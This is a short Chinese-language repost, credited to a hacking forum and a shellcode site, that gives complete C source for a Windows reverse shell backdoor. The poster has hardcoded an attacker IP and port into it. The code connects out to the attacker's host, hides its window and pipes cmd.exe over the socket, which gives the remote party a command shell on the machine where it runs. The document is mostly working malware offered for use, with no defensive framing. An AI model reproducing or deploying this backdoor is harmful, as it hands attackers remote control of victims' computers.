转载来源:
https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/
http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
下面是我根据原文的修改,将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
WSADATA wsaData;
SOCKET Winsock; // 本地socket
struct sockaddr_in hax; // 黑客的地址结构
char ip_addr[16] = "192.168.3.237"; // 黑客的ip地址(或者主机名)
char port[6] = "7500"; // 黑客的端口
// 指定新进程主窗口的特性
STARTUPINFO ini_processo;
// 返回有关新进程及其主线程的信息
PROCESS_INFORMATION processo_info;
int main()
{
WSAStartup(MAKEWORD(2, 2), &wsaData);
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
struct hostent *host; // 黑客主机信息
host = gethostbyname(ip_addr);
strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
hax.sin_family = AF_INET;
hax.sin_port = htons(atoi(port));
hax.sin_addr.s_addr = inet_addr(ip_addr);
// 连接黑客主机
WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; // 重定向,隐藏窗口
// 将标准输入、输出、错误重定向到socket句柄
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
TCHAR cmd[255] = TEXT("cmd.exe");
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
return 0;
}